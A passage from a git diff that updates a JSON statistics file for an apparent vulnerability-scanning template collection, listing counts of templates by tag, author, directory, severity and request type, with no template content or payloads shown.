++++++++++++++++++++---------------------- TOP-10.md | 20 +- 3 files changed, 631 insertions(+), 664 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 23d3d7affa..7f012a1194 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":533},{"name":"panel","count":213},{"name":"xss","count":194},{"name":"wordpress","count":184},{"name":"exposure","count":178},{"name":"rce","count":177},{"name":"lfi","count":152},{"name":"cve2020","count":151},{"name":"wp-plugin","count":123},{"name":"tech","count":93},{"name":"config","count":90},{"name":"cve2021","count":84},{"name":"cve2019","count":84},{"name":"takeover","count":72},{"name":"cve2018","count":67},{"name":"","count":66},{"name":"token","count":64},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"cve2017","count":45},{"name":"iot","count":44},{"name":"file","count":43},{"name":"unauth","count":42},{"name":"network","count":35},{"name":"oob","count":34},{"name":"sqli","count":34},{"name":"logs","count":29},{"name":"oracle","count":29},{"name":"workflow","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":24},{"name":"listing","count":23},{"name":"redirect","count":21},{"name":"aem","count":19},{"name":"cisco","count":18},{"name":"cve2015","count":16},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2012","count":13},{"name":"misconfig","count":13},{"name":"fuzz","count":13},{"name":"auth-bypass","count":12},{"name":"dns","count":12},{"name":"cve2014","count":12},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"jenkins","count":11},{"name":"cve2011","count":11},{"name":"devops","count":10},{"name":"dlink","count":10},{"name":"cve2013","count":10},{"name":"php","count":10},{"name":"magento","count":9},{"name":"router","count":9},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"ftp","count":8},{"name":"aws","count":8},{"name":"gitlab","count":8},{"name":"xxe","count":7},{"name":"vmware","count":7},{"name":"cve2009","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"login","count":7},{"name":"joomla","count":7},{"name":"dell","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"api","count":6},{"name":"drupal","count":5},{"name":"confluence","count":5},{"name":"django","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"files","count":5},{"name":"iis","count":5},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"laravel","count":5},{"name":"ruijie","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"netgear","count":5},{"name":"ibm","count":5},{"name":"java","count":5},{"name":"samsung","count":4},{"name":"crlf","count":4},{"name":"tomcat","count":4},{"name":"docker","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"asp","count":4},{"name":"jolokia","count":4},{"name":"thinkcmf","count":4},{"name":"vpn","count":4},{"name":"deserialization","count":4},{"name":"traversal","count":4},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"webserver","count":4},{"name":"hongdian","count":4},{"name":"artifactory","count":4},{"name":"targa","count":3},{"name":"nosqli","count":3},{"name":"fanruan","count":3},{"name":"slack","count":3},{"name":"nacos","count":3},{"name":"ebs","count":3},{"name":"mongodb","count":3},{"name":"windows","count":3},{"name":"oa","count":3},{"name":"log","count":3},{"name":"ssh","count":3},{"name":"r-seenet","count":3},{"name":"cve2010","count":3},{"name":"hp","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"amazon","count":3},{"name":"kafka","count":3},{"name":"terramaster","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"bitrix","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"fpd","count":3},{"name":"itop","count":3},{"name":"zabbix","count":3},{"name":"ofbiz","count":3},{"name":"grafana","count":3},{"name":"springcloud","count":3},{"name":"kubernetes","count":3},{"name":"printer","count":3},{"name":"bypass","count":3},{"name":"couchdb","count":2},{"name":"plesk","count":2},{"name":"service","count":2},{"name":"akamai","count":2},{"name":"sharepoint","count":2},{"name":"activemq","count":2},{"name":"horde","count":2},{"name":"strapi","count":2},{"name":"github","count":2},{"name":"huawei","count":2},{"name":"rstudio","count":2},{"name":"wordfence","count":2},{"name":"cve2008","count":2},{"name":"ecology","count":2},{"name":"dos","count":2},{"name":"kibana","count":2},{"name":"shellshock","count":2},{"name":"hashicorp","count":2},{"name":"voipmonitor","count":2},{"name":"chamilo","count":2},{"name":"phpcollab","count":2},{"name":"bigip","count":2},{"name":"hpe","count":2},{"name":"trixbox","count":2},{"name":"smtp","count":2},{"name":"keycloak","count":2},{"name":"prometheus","count":2},{"name":"seeyon","count":2},{"name":"injection","count":2},{"name":"sonarqube","count":2},{"name":"webcam","count":2},{"name":"saltstack","count":2},{"name":"mida","count":2},{"name":"leak","count":2},{"name":"rockethchat","count":2},{"name":"maian","count":2},{"name":"telerik","count":2},{"name":"globalprotect","count":2},{"name":"openfire","count":2},{"name":"status","count":2},{"name":"odoo","count":2},{"name":"xxljob","count":2},{"name":"flir","count":2},{"name":"igs","count":2},{"name":"smb","count":2},{"name":"waf","count":2},{"name":"zhiyuan","count":2},{"name":"natshell","count":2},{"name":"rockmongo","count":2},{"name":"yapi","count":2},{"name":"jsf","count":2},{"name":"fortios","count":2},{"name":"glassfish","count":2},{"name":"idrac","count":2},{"name":"cache","count":2},{"name":"nextjs","count":2},{"name":"mail","count":2},{"name":"jboss","count":2},{"name":"httpd","count":2},{"name":"pega","count":2},{"name":"microsoft","count":2},{"name":"kentico","count":2},{"name":"paloalto","count":2},{"name":"linkerd","count":2},{"name":"openam","count":2},{"name":"spark","count":2},{"name":"chiyu","count":2},{"name":"vrealize","count":2},{"name":"kevinlab","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"ucmdb","count":2},{"name":"hjtcloud","count":2},{"name":"nexus","count":2},{"name":"icewarp","count":2},{"name":"jellyfin","count":2},{"name":"cve2007","count":2},{"name":"intrusive","count":2},{"name":"sonicwall","count":2},{"name":"showdoc","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"splunk","count":2},{"name":"emerge","count":2},{"name":"sureline","count":1},{"name":"jfrog","count":1},{"name":"ssl","count":1},{"name":"tpshop","count":1},{"name":"mobileiron","count":1},{"name":"wamp","count":1},{"name":"panos","count":1},{"name":"wavlink","count":1},{"name":"mcafee","count":1},{"name":"redhat","count":1},{"name":"tensorboard","count":1},{"name":"varnish","count":1},{"name":"openx","count":1},{"name":"mongo","count":1},{"name":"opencast","count":1},{"name":"kubeflow","count":1},{"name":"spf","count":1},{"name":"socomec","count":1},{"name":"jenzabar","count":1},{"name":"sceditor","count":1},{"name":"kyan","count":1},{"name":"glances","count":1},{"name":"nedi","count":1},{"name":"opentsdb","count":1},{"name":"flash","count":1},{"name":"goahead","count":1},{"name":"memcached","count":1},{"name":"nsasg","count":1},{"name":"postmessage","count":1},{"name":"exposures","count":1},{"name":"klog","count":1},{"name":"krweb","count":1},{"name":"nette","count":1},{"name":"emc","count":1},{"name":"camunda","count":1},{"name":"shopware","count":1},{"name":"pulsesecure","count":1},{"name":"linksys","count":1},{"name":"blue-ocean","count":1},{"name":"xvr","count":1},{"name":"weiphp","count":1},{"name":"phpunit","count":1},{"name":"monitorix","count":1},{"name":"circontrorl","count":1},{"name":"aura","count":1},{"name":"ecom","count":1},{"name":"ulterius","count":1},{"name":"payara","count":1},{"name":"scs","count":1},{"name":"vsphere","count":1},{"name":"discord","count":1},{"name":"htmli","count":1},{"name":"shopxo","count":1},{"name":"cerebro","count":1},{"name":"sidekiq","count":1},{"name":"commscope","count":1},{"name":"dvwa","count":1},{"name":"yachtcontrol","count":1},{"name":"pagespeed","count":1},{"name":"chevereto","count":1},{"name":"gridx","count":1},{"name":"solman","count":1},{"name":"bullwark","count":1},{"name":"circontrol","count":1},{"name":"enum","count":1},{"name":"centos","count":1},{"name":"expose","count":1},{"name":"webftp","count":1},{"name":"default","count":1},{"name":"triconsole","count":1},{"name":"realteo","count":1},{"name":"rsyncd","count":1},{"name":"netis","count":1},{"name":"dvr","count":1},{"name":"xdcms","count":1},{"name":"springframework","count":1},{"name":"cgi","count":1},{"name":"iptime","count":1},{"name":"wmt","count":1},{"name":"szhe","count":1},{"name":"clusterengine","count":1},{"name":"codemeter","count":1},{"name":"calendarix","count":1},{"name":"blackboard","count":1},{"name":"achecker","count":1},{"name":"esmtp","count":1},{"name":"gateone","count":1},{"name":"2014","count":1},{"name":"pippoint","count":1},{"name":"metinfo","count":1},{"name":"k8s","count":1},{"name":"fortigates","count":1},{"name":"starttls","count":1},{"name":"tongda","count":1},{"name":"setup","count":1},{"name":"spring","count":1},{"name":"eprints","count":1},{"name":"ambari","count":1},{"name":"rubedo","count":1},{"name":"rhymix","count":1},{"name":"moinmoin","count":1},{"name":"sourcebans","count":1},{"name":"lanproxy","count":1},{"name":"zookeeper","count":1},{"name":"subrion","count":1},{"name":"centreon","count":1},{"name":"acontent","count":1},{"name":"netsweeper","count":1},{"name":"openstack","count":1},{"name":"dom","count":1},{"name":"seacms","count":1},{"name":"synnefo","count":1},{"name":"concrete","count":1},{"name":"cacti","count":1},{"name":"oscommerce","count":1},{"name":"wp-theme","count":1},{"name":"ems","count":1},{"name":"geddy","count":1},{"name":"apiman","count":1},{"name":"gespage","count":1},{"name":"beanshell","count":1},{"name":"fiori","count":1},{"name":"feifeicms","count":1},{"name":"chinaunicom","count":1},{"name":"thinkadmin","count":1},{"name":"hortonworks","count":1},{"name":"adminer","count":1},{"name":"eyou","count":1},{"name":"tika","count":1},{"name":"bitly","count":1},{"name":"sangfor","count":1},{"name":"gloo","count":1},{"name":"wildfly","count":1},{"name":"dotnet","count":1},{"name":"openerp","count":1},{"name":"ganglia","count":1},{"name":"spip","count":1},{"name":"redis","count":1},{"name":"sgp","count":1},{"name":"rmc","count":1},{"name":"mailchimp","count":1},{"name":"wooyun","count":1},{"name":"vsftpd","count":1},{"name":"lighttpd","count":1},{"name":"apos","count":1},{"name":"portainer","count":1},{"name":"gitlist","count":1},{"name":"dlogin","count":1},{"name":"db","count":1},{"name":"gogs","count":1},{"name":"rmi","count":1},{"name":"nps","count":1},{"name":"cocoon","count":1},{"name":"xff","count":1},{"name":"cloudflare","count":1},{"name":"tensorflow","count":1},{"name":"optiLink","count":1},{"name":"ueditor","count":1},{"name":"openrestry","count":1},{"name":"keenetic","count":1},{"name":"javafaces","count":1},{"name":"h3c-imc","count":1},{"name":"cloudinary","count":1},{"name":"cse","count":1},{"name":"tamronos","count":1},{"name":"razor","count":1},{"name":"manageengine","count":1},{"name":"opensns","count":1},{"name":"majordomo2","count":1},{"name":"duomicms","count":1},{"name":"mdb","count":1},{"name":"darkstat","count":1},{"name":"spectracom","count":1},{"name":"phalcon","count":1},{"name":"saltapi","count":1},{"name":"landray","count":1},{"name":"npm","count":1},{"name":"moin","count":1},{"name":"biometrics","count":1},{"name":"lutron","count":1},{"name":"qvisdvr","count":1},{"name":"skywalking","count":1},{"name":"b2evolution","count":1},{"name":"qcubed","count":1},{"name":"fastapi","count":1},{"name":"sco","count":1},{"name":"zzzcms","count":1},{"name":"ricoh","count":1},{"name":"domxss","count":1},{"name":"bigbluebutton","count":1},{"name":"dotclear","count":1},{"name":"svnserve","count":1},{"name":"webmodule-ee","count":1},{"name":"alibaba","count":1},{"name":"harbor","count":1},{"name":"avalanche","count":1},{"name":"checkpoint","count":1},{"name":"74cms","count":1},{"name":"alertmanager","count":1},{"name":"wso2","count":1},{"name":"upnp","count":1},{"name":"rfi","count":1},{"name":"octoprint","count":1},{"name":"dnssec","count":1},{"name":"csod","count":1},{"name":"rdp","count":1},{"name":"sarg","count":1},{"name":"javascript","count":1},{"name":"sentry","count":1},{"name":"huijietong","count":1},{"name":"fortigate","count":1},{"name":"opensmtpd","count":1},{"name":"resourcespace","count":1},{"name":"turbocrm","count":1},{"name":"viewlinc","count":1},{"name":"floc","count":1},{"name":"wifisky","count":1},{"name":"emby","count":1},{"name":"ns","count":1},{"name":"lotuscms","count":1},{"name":"zcms","count":1},{"name":"traefik","count":1},{"name":"clink-office","count":1},{"name":"mantisbt","count":1},{"name":"idemia","count":1},{"name":"nuuo","count":1},{"name":"postgres","count":1},{"name":"symfony","count":1},{"name":"nc2","count":1},{"name":"sitecore","count":1},{"name":"interlib","count":1},{"name":"mirai","count":1},{"name":"wing-ftp","count":1},{"name":"akkadian","count":1},{"name":"vnc","count":1},{"name":"k8","count":1},{"name":"wondercms","count":1},{"name":"parentlink","count":1},{"name":"jquery","count":1},{"name":"openemr","count":1},{"name":"lancom","count":1},{"name":"webmin","count":1},{"name":"crm","count":1},{"name":"doh","count":1},{"name":"discourse","count":1},{"name":"plugin","count":1},{"name":"avtech","count":1},{"name":"monitorr","count":1},{"name":"zeroshell","count":1},{"name":"node-red-dashboard","count":1},{"name":"anchorcms","count":1},{"name":"finereport","count":1},{"name":"ec2","count":1},{"name":"appweb","count":1},{"name":"phpfusion","count":1},{"name":"liferay","count":1},{"name":"xmlchart","count":1},{"name":"magicflow","count":1},{"name":"webui","count":1},{"name":"myucms","count":1},{"name":"clockwatch","count":1},{"name":"smartsense","count":1},{"name":"bruteforce","count":1},{"name":"octobercms","count":1},{"name":"timeclock","count":1},{"name":"timesheet","count":1},{"name":"arl","count":1},{"name":"hadoop","count":1},{"name":"clave","count":1},{"name":"maccmsv10","count":1},{"name":"lansweeper","count":1},{"name":"kafdrop","count":1},{"name":"addpac","count":1},{"name":"soar","count":1},{"name":"rujjie","count":1},{"name":"erp-nc","count":1},{"name":"froxlor","count":1},{"name":"nordex","count":1},{"name":"redwood","count":1},{"name":"azure","count":1},{"name":"exacqvision","count":1},{"name":"rabbitmq","count":1},{"name":"wavemaker","count":1},{"name":"mediumish","count":1},{"name":"embedthis","count":1},{"name":"mantis","count":1},{"name":"powercreator","count":1},{"name":"netrc","count":1},{"name":"plastic","count":1},{"name":"stem","count":1},{"name":"st","count":1},{"name":"druid","count":1},{"name":"mariadb","count":1},{"name":"mara","count":1},{"name":"ntopng","count":1},{"name":"cve2005","count":1},{"name":"ssltls","count":1},{"name":"wiki","count":1},{"name":"xml","count":1},{"name":"dompdf","count":1},{"name":"backdoor","count":1},{"name":"robomongo","count":1},{"name":"episerver","count":1},{"name":"kong","count":1},{"name":"twitter-server","count":1},{"name":"nuxeo","count":1},{"name":"etouch","count":1},{"name":"javamelody","count":1},{"name":"upload","count":1},{"name":"plc","count":1},{"name":"yii","count":1},{"name":"totaljs","count":1},{"name":"fuelcms","count":1},{"name":"zte","count":1},{"name":"grav","count":1},{"name":"favicon","count":1},{"name":"redcap","count":1},{"name":"mysql","count":1},{"name":"exchange","count":1},{"name":"pyramid","count":1},{"name":"tileserver","count":1},{"name":"expressjs","count":1},{"name":"hasura","count":1},{"name":"zm","count":1},{"name":"fastcgi","count":1},{"name":"jitsi","count":1},{"name":"tenda","count":1},{"name":"cobub","count":1},{"name":"faraday","count":1},{"name":"blind","count":1},{"name":"linkedin","count":1},{"name":"wuzhicms","count":1},{"name":"spidercontrol","count":1},{"name":"zarafa","count":1},{"name":"flink","count":1},{"name":"fortiweb","count":1},{"name":"glpi","count":1},{"name":"selea","count":1},{"name":"panabit","count":1},{"name":"zenario","count":1},{"name":"acme","count":1},{"name":"labtech","count":1},{"name":"codeigniter","count":1},{"name":"bolt","count":1},{"name":"cors","count":1},{"name":"comodo","count":1},{"name":"accela","count":1},{"name":"csrf","count":1},{"name":"visualtools","count":1},{"name":"xunchi","count":1},{"name":"wazuh","count":1},{"name":"opm","count":1},{"name":"uwsgi","count":1},{"name":"dotnetnuke","count":1},{"name":"zmanda","count":1},{"name":"jeewms","count":1},{"name":"trilithic","count":1},{"name":"proftpd","count":1},{"name":"svn","count":1},{"name":"vscode","count":1},{"name":"visionhub","count":1},{"name":"axis","count":1},{"name":"pacsone","count":1},{"name":"nomad","count":1},{"name":"expn","count":1},{"name":"haproxy","count":1},{"name":"fortilogger","count":1},{"name":"lg-nas","count":1},{"name":"geutebruck","count":1},{"name":"zimbra","count":1},{"name":"getsimple","count":1},{"name":"sqlite","count":1},{"name":"node","count":1},{"name":"jmx","count":1},{"name":"mongoshake","count":1},{"name":"acexy","count":1},{"name":"servicedesk","count":1},{"name":"webadmin","count":1},{"name":"pgadmin","count":1},{"name":"mautic","count":1},{"name":"phpinfo","count":1},{"name":"bookstack","count":1},{"name":"firebase","count":1},{"name":"grails","count":1},{"name":"aruba","count":1},{"name":"drone","count":1},{"name":"enumeration","count":1},{"name":"email","count":1},{"name":"alerta","count":1},{"name":"livezilla","count":1},{"name":"jenkin","count":1},{"name":"xiuno","count":1},{"name":"empirecms","count":1},{"name":"ilo4","count":1},{"name":"fortinet","count":1},{"name":"tapestry","count":1},{"name":"salesforce","count":1},{"name":"aspnuke","count":1},{"name":"jnoj","count":1},{"name":" default-login","count":1},{"name":"plone","count":1},{"name":"sage","count":1},{"name":"ruckus","count":1},{"name":"landrayoa","count":1},{"name":"extractor","count":1},{"name":"jsp","count":1},{"name":"viewpoint","count":1},{"name":"hiboss","count":1},{"name":"bash","count":1},{"name":"zend","count":1},{"name":"fedora","count":1},{"name":"bedita","count":1},{"name":"scimono","count":1},{"name":"swagger","count":1},{"name":"woocomernce","count":1},{"name":"netdata","count":1},{"name":"kerbynet","count":1},{"name":"servicenow","count":1},{"name":"nexusdb","count":1},{"name":"auth","count":1},{"name":"ioncube","count":1},{"name":"heroku","count":1},{"name":"diris","count":1},{"name":"ruby","count":1},{"name":"primetek","count":1},{"name":"mpsec","count":1},{"name":"sprintful","count":1}],"authors":[{"name":"dhiyaneshdk","count":232},{"name":"pikpikcu","count":219},{"name":"pdteam","count":189},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":121},{"name":"daffainfo","count":108},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gy741","count":50},{"name":"gaurang","count":42},{"name":"pussycat0x","count":36},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"philippedelteil","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":9},{"name":"nadino","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"hackergautam","count":8},{"name":"melbadry9","count":8},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"r3dg33k","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"elsfa7110","count":4},{"name":"nodauf","count":4},{"name":"meme-lord","count":4},{"name":"e_schultze_","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"shine","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"dudez","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"binaryfigments","count":3},{"name":"jarijaas","count":3},{"name":"udit_thakkur","count":2},{"name":"bsysop","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"afaq","count":2},{"name":"bing0o","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xprial","count":2},{"name":"emenalf","count":2},{"name":"0xelkomy","count":2},{"name":"0xcrypto","count":2},{"name":"amsda","count":2},{"name":"joeldeleep","count":2},{"name":"davidmckennirey","count":2},{"name":"hetroublemakr","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"randomrobbie","count":2},{"name":"kiblyn11","count":2},{"name":"koti2","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"0xsapra","count":2},{"name":"foulenzer","count":2},{"name":"bp0lr","count":2},{"name":"lu4nx","count":2},{"name":"x1m_martijn","count":2},{"name":"unstabl3","count":2},{"name":"gevakun","count":2},{"name":"nkxxkn","count":2},{"name":"w4cky_","count":2},{"name":"swissky","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"ehsahil","count":2},{"name":"shifacyclewala","count":2},{"name":"incogbyte","count":2},{"name":"moritz nentwig","count":2},{"name":"0xrudra","count":2},{"name":"alifathi-h1","count":2},{"name":"random-robbie","count":2},{"name":"cookiehanhoan","count":1},{"name":"0xrod","count":1},{"name":"s1r1u5_","count":1},{"name":"b0yd","count":1},{"name":"bolli95","count":1},{"name":"flag007","count":1},{"name":"pudsec","count":1},{"name":"elder tao","count":1},{"name":"revblock","count":1},{"name":"d0rkerdevil","count":1},{"name":"daviey","count":1},{"name":"toufik airane","count":1},{"name":"ilovebinbash","count":1},{"name":"deena","count":1},{"name":"elmahdi","count":1},{"name":"hakluke","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"schniggie","count":1},{"name":"whynotke","count":1},{"name":"jteles","count":1},{"name":"absshax","count":1},{"name":"ldionmarcil","count":1},{"name":"qlkwej","count":1},{"name":"micha3lb3n","count":1},{"name":"j33n1k4","count":1},{"name":"0xtavian","count":1},{"name":"rodnt","count":1},{"name":"thezakman","count":1},{"name":"_darrenmartyn","count":1},{"name":"yashanand155","count":1},{"name":"gboddin","count":1},{"name":"luskabol","count":1},{"name":"fopina","count":1},{"name":"idealphase","count":1},{"name":"andirrahmani1","count":1},{"name":"soyelmago","count":1},{"name":"abison_binoy","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"regala_","count":1},{"name":"makyotox","count":1},{"name":"manuelbua","count":1},{"name":"pdp","count":1},{"name":"retr0","count":1},{"name":"andysvints","count":1},{"name":"its0x08","count":1},{"name":"_c0wb0y_","count":1},{"name":"juicypotato1","count":1},{"name":"r3naissance","count":1},{"name":"naglinagli","count":1},{"name":"yavolo","count":1},{"name":"sy3omda","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"noamrathaus","count":1},{"name":"vsh00t","count":1},{"name":"hanlaomo","count":1},{"name":"raesene","count":1},{"name":"becivells","count":1},{"name":"rojanrijal","count":1},{"name":"omarkurt","count":1},{"name":"taielab","count":1},{"name":"chron0x","count":1},{"name":"thevillagehacker","count":1},{"name":"tirtha_mandal","count":1},{"name":"luci","count":1},{"name":"exploitation","count":1},{"name":"smaranchand","count":1},{"name":"un-fmunozs","count":1},{"name":"ringo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0h1in9e","count":1},{"name":"gal nagli","count":1},{"name":"akshansh","count":1},{"name":"mohammedsaneem","count":1},{"name":"b4uh0lz","count":1},{"name":"ooooooo_q","count":1},{"name":"sshell","count":1},{"name":"rtcms","count":1},{"name":"_harleo","count":1},{"name":"zandros0","count":1},{"name":"alex","count":1},{"name":"c3l3si4n","count":1},{"name":"dogasantos","count":1},{"name":"shelld3v","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"divya_mudgal","count":1},{"name":"defr0ggy","count":1},{"name":"kabirsuda","count":1},{"name":"zhenwarx","count":1},{"name":"petruknisme","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mubassirpatel","count":1},{"name":"kurohost","count":1},{"name":"tim_koopmans","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"shifacyclewla","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"shreyapohekar","count":1},{"name":"aresx","count":1},{"name":"furkansenan","count":1},{"name":"co0nan","count":1},{"name":"alperenkesk","count":1},{"name":"undefl0w","count":1},{"name":"akash.c","count":1},{"name":"bernardofsr","count":1},{"name":"knassar702","count":1},{"name":"dawid czarnecki","count":1},{"name":"arcc","count":1},{"name":"berkdusunur","count":1},{"name":"wabafet","count":1},{"name":"@dwisiswant0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"geraldino2","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"sicksec","count":1},{"name":"sickwell","count":1},{"name":"yashgoti","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"bjhulst","count":1},{"name":"remonsec","count":1},{"name":"alph4byt3","count":1},{"name":"0xteles","count":1},{"name":"ajaysenr","count":1},{"name":"ohlinge","count":1},{"name":"sullo","count":1},{"name":"bad5ect0r","count":1},{"name":"52971","count":1},{"name":"kareemse1im","count":1},{"name":"notsoevilweasel","count":1},{"name":"th3.d1p4k","count":1},{"name":"philippdelteil","count":1},{"name":"johnjhacking","count":1},{"name":"0ut0fb4nd","count":1},{"name":"iampritam","count":1},{"name":"patralos","count":1},{"name":"vzamanillo","count":1},{"name":"willd96","count":1},{"name":"ipanda","count":1},{"name":"blckraven","count":1},{"name":"johnk3r","count":1},{"name":"affix","count":1},{"name":"fmunozs","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"nytr0gen","count":1},{"name":"huowuzhao","count":1},{"name":"apt-mirror","count":1},{"name":"me9187","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"mah3sec_","count":1}],"directory":[{"name":"cves","count":540},{"name":"vulnerabilities","count":249},{"name":"exposed-panels","count":215},{"name":"exposures","count":170},{"name":"technologies","count":151},{"name":"misconfiguration","count":119},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":43},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":563},{"name":"high","count":436},{"name":"medium","count":363},{"name":"critical","count":206},{"name":"low","count":150}],"types":[{"name":"http","count":1624},{"name":"file","count":43},{"name":"network","count":35},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat",